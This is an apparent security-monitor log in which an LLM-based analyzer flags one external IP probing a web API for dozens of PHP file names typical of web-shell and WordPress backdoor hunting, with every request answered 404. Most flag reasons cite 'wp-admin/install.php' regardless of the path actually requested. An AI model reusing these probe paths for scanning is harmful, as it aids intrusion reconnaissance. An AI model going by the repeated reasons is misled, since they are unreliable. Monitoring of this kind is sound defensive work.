Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. 
Line=2026-03-20T12:46:03.772544736Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /wp-act.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.843522 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.843289435Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /cu.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.910075 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.909734383Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /fs.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.979480 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.979153693Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /asd.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.050123 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. 
Line=2026-03-20T12:46:04.047886927Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ws80.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.115580 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.115325607Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ms.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.181543 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.181112596Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /jga.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.247390 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.247065065Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /666.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.314573 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.314289725Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /zc-104.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.386401 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.386190133Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ws88.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.508573 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.508304612Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ws60.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.579864 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.579655890Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /bo.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.651350 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.651066388Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ws84.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.717473 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.717025133Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /public/vx.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.783418 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.783125908Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /vanda.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.849488 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.849018659Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /amp.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.915435 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.915198508Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /a4.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.988579 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:04.988287220Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /1.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.055060 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.054812780Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /b.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.142776 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.142473695Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /hots.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.389761 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.389507229Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /wp-the.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.455776 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.455439111Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /kj.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.521790 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.521412239Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /a5.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.558783 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: LLM returned 520: error code: 520
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.558846 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp
Line=2026-03-20T12:46:01.828374881Z 10.0.1.9 - - [20/Mar/2026:12:46:01 +0000] "GET /wp-content/plugins/he...
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.587532 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.587311880Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /44.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.660916 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.660715653Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /public/ws49.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:05.726827 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.726505710Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /xxw.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:10.508651 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:46:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:10.508686 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A single 404 GET request for wp-blogs.php suggests probing for WordPress-related resources; could be incidental or malicious scanning.
Line=2026-03-20T12:46:01.894599093Z 10.0.1.9 - - [20/Mar/2026:12:46:01 +0000] "GET /wp-blogs.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.005796 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.005840 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a PHP file sa.php7 returning 404 from a public domain; could indicate probing or misconfiguration.
Line=2026-03-20T12:46:05.830465409Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /sa.php7 HTTP/1.1" 404 6622 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006040 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.896738474Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /ms-edit.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006077 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:05.962671563Z 4.204.200.32 - - [20/Mar/2026:12:46:05 +0000] "api.admin.kovicloud.com" "GET /wp9.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006128 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.028595467Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /wen.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006186 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.095954096Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /wp5.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006225 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.161788785Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /varb.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006249 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.228410238Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /tt.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006271 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.294175822Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /gettest.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006295 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.360095718Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /vx.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006326 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.444476497Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /abrand.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006348 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.647576061Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /8573.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006370 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.713652371Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /bolt.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006393 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.780460169Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /tfm.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006413 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.846895013Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /lm15.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006438 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.913845396Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET /wp-admin/css/bolt.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006463 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:06.980363421Z 4.204.200.32 - - [20/Mar/2026:12:46:06 +0000] "api.admin.kovicloud.com" "GET //nw.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006487 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.049794901Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /bnm.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006510 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.116584659Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /nw.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006534 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.187101944Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /s.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006560 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.261335398Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /hplfuns.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006590 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.327050107Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /jp.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006616 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.407200365Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /xsas.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006642 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.514630315Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /5b9ac.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006666 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.581142985Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /okxh.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006708 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.648191758Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /rzki.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006734 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.723839964Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /edit.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006759 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.904492591Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /t.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006821 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:07.972524513Z 4.204.200.32 - - [20/Mar/2026:12:46:07 +0000] "api.admin.kovicloud.com" "GET /file.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.006849 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.038545577Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /66.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007583 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.114355337Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /amax.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007617 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.180041567Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /ioxi-o.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007641 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.271672810Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /admin/index.php HTTP/1.1" 404 146 "-" "-" "-"
